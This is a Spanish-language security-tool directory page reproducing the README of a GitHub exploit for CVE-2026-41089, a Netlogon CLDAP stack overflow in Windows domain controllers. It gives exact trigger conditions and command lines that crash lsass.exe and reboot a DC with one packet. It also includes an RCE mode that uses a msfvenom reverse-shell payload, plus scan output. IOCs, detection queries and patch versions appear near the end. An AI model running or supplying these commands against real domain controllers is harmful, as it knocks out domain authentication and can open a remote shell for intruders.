Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41089 — CVE-2026-41089 es una vulnerabilidad crítica de ejecución remota de código en el servicio Windows Netlogon que puede hacer que lsass.exe falle con un solo paquete, provocando que el controlador de dominio se reinicie en aproximadamente 30-60 segundos. Durante este tiempo, toda la autenticación del dominio en ese DC fallará. | Kitploit
Herramientas/GitHubGitHub/hnytgl/cve-2026-41089
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónHerramienta de Acceso RemotoExplotación de Binarios
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Ver Repositorio
141214hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

CVE-2026-41089 es una vulnerabilidad crítica de ejecución remota de código en el servicio Windows Netlogon que puede hacer que lsass.exe falle con un solo paquete, provocando que el controlador de dominio se reinicie en aproximadamente 30-60 segundos. Durante este tiempo, toda la autenticación del dominio en ese DC fallará.

Compartir

CVE-2026-41089 — Exploit de Desbordamiento de Búfer en la Pila de Windows Netlogon CLDAP RCE

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Crítico)
CWE: CWE-121 (Desbordamiento de Búfer basado en la Pila)
Vector de ataque: UDP/389 (CLDAP SearchRequest)
Impacto: Ejecución remota de código (RCE) / Denegación de servicio (DoS)
Versiones afectadas: Windows Server 2012 R2 ~ 2025 (Controladores de dominio)
Parche: Actualización acumulativa de mayo de 2026

Resumen de la vulnerabilidad

La función NetpLogonPutUnicodeString en netlogon.dll presenta una vulnerabilidad de desbordamiento de búfer en la pila al procesar solicitudes de búsqueda CLDAP. Esta función recibe un presupuesto de longitud en bytes, pero lo interpreta como un recuento de WCHAR, lo que provoca que la cantidad escrita sea 2 veces la esperada.

El desbordamiento ocurre en un búfer de pila fijo de 528 bytes (264 ushort) en la función NlGetLocalPingResponse. El campo User controlable por el atacante, junto con el propio nombre de dominio DNS del servidor, llenan este búfer, sobrescribiendo finalmente la GS Cookie de seguridad, lo que provoca y el bloqueo de .

__report_gsfailure
lsass.exe

Condiciones de activación

  • CLDAP SearchRequest con NtVer=0x02 (obliga a usar la ruta antigua y vulnerable BuildSamLogonResponse)
  • Longitud del campo User ≥ ~130 caracteres (límite binario de aproximadamente 260 bytes UTF-16)
  • Longitud del nombre de dominio DNS del servidor ≥ ~80 caracteres (cuanto más largo sea el dominio, más fácil alcanzar la Cookie)

Nota: NtVer=0x16 (valor utilizado por muchos scripts de detección públicos) activa la ruta segura BuildSamLogonResponseEx, sin desencadenar la vulnerabilidad.

Funcionalidades

ModoDescripción
--mode dosEnvía paquetes CLDAP especialmente diseñados que provocan el bloqueo de LSASS y el reinicio del DC (~60 segundos de interrupción de autenticación)
--mode rceIntenta la ejecución remota de código (nivel de investigación, requiere shellcode)
--mode scanEscanea las respuestas para diferentes valores de NtVer, realizando huellas digitales del DC objetivo
--mode autoDetecta automáticamente y selecciona la mejor estrategia de ataque

Modo DoS

Un solo paquete puede bloquear lsass.exe, provocando que el controlador de dominio se reinicie en aproximadamente 30-60 segundos. Durante este período, toda la autenticación de dominio en ese DC fallará.

root@kitploit:~
# Uso básico — Enviar 3 paquetes
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Ataque rápido de un solo paquete
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Modo agresivo — 5 paquetes concurrentes
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Modo RCE

⚠️ Nivel de investigación — No fiable ni estable en entornos reales.

El RCE se enfrenta a los siguientes desafíos:

  1. Los datos de desbordamiento son el nombre DNS del propio servidor, no el shellcode del atacante
  2. La GS Cookie debe ser eludida (requiere primitiva de fuga de información o fuerza bruta)
  3. CET/ACG/CFG en Server 2022+ hacen que el ROP tradicional sea más difícil
root@kitploit:~
# Generar shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Enviar cadena de RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Modo Scan

root@kitploit:~
# Realizar huellas digitales del DC objetivo
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Ejemplo de salida esperada (objetivo parcheado):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Ejemplo de salida esperada (objetivo sin parchear):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Si NtVer=0x02 agota el tiempo de espera mientras otras versiones responden normalmente, es muy probable que el objetivo sea vulnerable.

Parámetros avanzados

ParámetroDescripciónValor predeterminado
-l, --user-lenLongitud del campo de nombre de usuario (número de caracteres ASCII)180
--ntverValor NtVer (hexadecimal, ej. 0x02)0x02
--countNúmero de paquetes DoS a enviar3
--delayRetardo entre paquetes (segundos)0.5
-t, --timeoutTiempo de espera del socket (segundos)5.0
--jsonSalida de resultados en formato JSON—
--rawImprimir el paquete en hexadecimal antes de enviarlo—
--quietSuprimir el banner de salida—
--shellcode-fileArchivo de shellcode personalizado (x64 raw)—
--lhostDirección de escucha del shell inverso—
--lportPuerto de escucha del shell inverso4444

Configuración del entorno de pruebas

root@kitploit:~
# En un Windows Server (sin parchear) crear un DC con nombre de dominio largo:
# 1. Promover a controlador de dominio (nombre de dominio DNS muy largo, por ejemplo "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Asegurarse de que los parches anteriores a mayo de 2026 estén instalados
# 3. Desde la máquina atacante ejecutar:
python CVE-2026-41089-exp.py <DC_IP> <NOMBRE_DOMINIO_LARGO> --mode dos --count 1
# 4. Observar el bloqueo y reinicio del DC

Indicadores de compromiso (IOCs)

Red

  • CLDAP SearchRequest en UDP/389 con User > 100 bytes y NtVer = 0x02
  • Tráfico CLDAP anómalo desde hosts que no son controladores de dominio hacia el DC

Anfitrión

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Reglas de detección

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Información del parche

Versión de Windows ServerNúmero de versión del parcheNotas
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Aviso legal

Esta herramienta está destinada únicamente para evaluaciones de seguridad autorizadas, pruebas de penetración, competiciones CTF e investigación defensiva. El uso de esta herramienta contra cualquier sistema sin autorización explícita por escrito es ilegal. El usuario asume toda la responsabilidad legal.

Enlaces de referencia

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Descargar herramienta